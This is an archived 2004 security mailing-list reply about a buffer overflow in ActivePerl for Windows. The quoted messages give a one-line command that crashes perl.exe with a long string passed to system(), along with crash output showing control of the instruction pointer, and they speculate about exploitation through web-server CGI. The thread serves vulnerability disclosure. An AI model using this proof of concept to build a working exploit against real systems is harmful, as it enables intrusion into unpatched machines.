lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Tue, 18 May 2004 20:30:46 +0545
From: npguy <npguy@...surfer.com.np>
To: Nick FitzGerald <nick@...us-l.demon.co.uk>
Cc: bugtraq@...urityfocus.com, full-disclosure@...ts.netsys.com
Subject: Re: Re: Buffer Overflow in ActivePerl ?


perl, v5.8.2 MSWin32-x86-multi-thread suffer the same.


Tuesday, May 18, 2004, 7:14:41 PM, you wrote:

NF> "Oliver@...yhat.de" <Oliver@...yhat.de> wrote:

>> i played around with ActiveState's ActivePerl for Win32, and crashed
>> Perl.exe with the following command:
>> 
>> perl -e "$a="A" x 256; system($a)"

NF> Ditto -- "v5.8.0 built for MSWin32-x86-multi-thread" on Win2K SP4 plus
NF> all but last week's security patch:

NF>    perl -e "$a="A" x 256; system($a)"

NF>    perl.exe - Application error

NF>    Unhandled instruction at "0x77fcc83d" referenced memory at
NF>    "0x00657865.  The memory could not be "written".

NF> Also, it is likely exploitable -- push up the number of A's a bit:

NF>    C:\>perl -e "$a="A" x 259; system($a)"

NF>    perl.exe - Application error

NF>    Unhandled instruction at "0x77fcc83d" referenced memory at
NF>    "0x65004141.  The memory could not be "written".

NF> and we seem to get control of EIP.  Coincidence?  Try yet two more:

NF>    C:\>perl -e "$a="A" x 261; system($a)"

NF>    perl.exe - Application error

NF>    Unhandled instruction at "0x77fcc83d" referenced memory at
NF>    "0x41414141.  The memory could not be "written".

NF> Looks like full control of EIP...

NF> However, there is not likely to be a privilege escalation here unless
NF> perhaps a script processor on a web server can be cajoled into doing
NF> something with this??  (Not at all familiar with the innards of Windows
NF> web servers and their relationship to their CGI, etc processors...)





       npguy                            npguy€websurfer.com.np

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Powered by blists - more mailing lists